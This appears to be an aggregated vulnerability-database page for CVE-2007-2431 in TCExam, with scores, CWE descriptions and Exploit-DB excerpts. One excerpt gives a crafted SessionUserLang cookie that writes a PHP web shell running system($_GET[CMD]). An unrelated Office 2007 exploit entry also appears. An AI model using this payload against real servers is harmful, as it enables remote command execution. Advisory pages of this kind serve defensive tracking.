CVE-2007-2431
published 2007-05-02CVE-2007-2431: Dynamic variable evaluation vulnerability in shared/config/tce_config.php in TCExam 4.0.011 and earlier allows remote attackers to conduct cross-site scripting…
PriorityP429medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
5.10%
91.3th percentile
Dynamic variable evaluation vulnerability in shared/config/tce_config.php in TCExam 4.0.011 and earlier allows remote attackers to conduct cross-site scripting (XSS) and possibly other attacks by modifying critical variables such as $_SERVER, as demonstrated by injecting web script via the _SERVER[SCRIPT_NAME] parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tecnick.com | tcexam | <= 4.0.011 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Office 2007 - 'OGL.dll' DpOutputSpanStretch::OutputSpan Out of Bounds Write (MS15-080)
exploitdb·2015-08-21
CVE-2015-2431 Microsoft Office 2007 - 'OGL.dll' DpOutputSpanStretch::OutputSpan Out of Bounds Write (MS15-080)
Microsoft Office 2007 - 'OGL.dll' DpOutputSpanStretch::OutputSpan Out of Bounds Write (MS15-080)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=420&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0x4A45. OffViz identified this offset as OLESSRoot.DirectoryEntries[100].OLESSDirectoryEntry[20].sidLeft with an original value of 0x00000000 and a fuzzed value of 0x00008000.
Attached files:
Fuzzed minimized PoC: 1863274449_min.doc
Fuzzed non-minimized PoC: 1863274449_crash.doc
Original non-fuz
Exploit-DB
TCExam 4.0.011 - 'SessionUserLang' Shell Injection
exploitdb·2007-04-29
CVE-2007-2431 TCExam 4.0.011 - 'SessionUserLang' Shell Injection
TCExam 4.0.011 - 'SessionUserLang' Shell Injection
---
resource = array();
// set selecteed language
$this->language = strtoupper($language);
// set filename for cache
$this->cachefile = $cachefile;
if (file_exists($this->cachefile)) {
// read data from cache
require_once($this->cachefile);
$this->resource = $tmx;
} else {
if (!empty($this->cachefile)) {
// open cache file
file_put_contents($this->cachefile, "getResource(); // language array
...
you can pass a special crafted 'SessionUserLang' cookie to create a new file in /cache folder
and inject a newline and some php code inside of it, ex:
...
Cookie: SessionUserLang=%2F..%2F%0Asystem%28%24_GET%5BCMD%5D%29%3B%3F%3E%23%2F..%2Fsuntzu;
...
a new file called suntzu.php like this is created in /cache folder;
#/../suntzu
// DATE: 2007-
No writeups or analysis indexed.
CWE
Improper Control of Dynamically-Identified Variables
mitre_cwe·CVSS 6.4
[MEDIUM] CWE-914 Improper Control of Dynamically-Identified Variables
CWE-914: Improper Control of Dynamically-Identified Variables
The product does not properly restrict reading from or writing to dynamically-identified variables.
Many languages offer powerful features that allow the programmer to access arbitrary variables that are specified by an input string. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can modify unintended variables that have security implications.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Integrity. Impact: Modify Application Data. An attacker could modify sensitive data or program variables.
Scope: Integrity. Impact: Execute Unauthorized Code or Commands.
Scope: Other, Integrity. Impact: Varies by Context, Alter Exec
CWE
Dynamic Variable Evaluation
mitre_cwe·CVSS 6.4
[MEDIUM] CWE-627 Dynamic Variable Evaluation
CWE-627: Dynamic Variable Evaluation
In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions.
The resultant vulnerabilities depend on the behavior of the application, both at the crossover point and in any control/data flow that is reachable by the related variables or functions.
Background: Many interpreted languages support the use of a "$$varname" construct to set a variable whose name is specified by the $varname variable. In PHP, these are referred to as "variable variables." Functions might also be invoked using similar syntax, such as $$funcname(arg1, arg2).
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Co
http://secunia.com/advisories/25008http://sourceforge.net/forum/forum.php?forum_id=690912http://www.attrition.org/pipermail/vim/2007-May/001572.htmlhttp://www.securityfocus.com/bid/23704https://exchange.xforce.ibmcloud.com/vulnerabilities/33957https://www.exploit-db.com/exploits/3816http://secunia.com/advisories/25008http://sourceforge.net/forum/forum.php?forum_id=690912http://www.attrition.org/pipermail/vim/2007-May/001572.htmlhttp://www.securityfocus.com/bid/23704https://exchange.xforce.ibmcloud.com/vulnerabilities/33957https://www.exploit-db.com/exploits/3816
2007-05-02
Published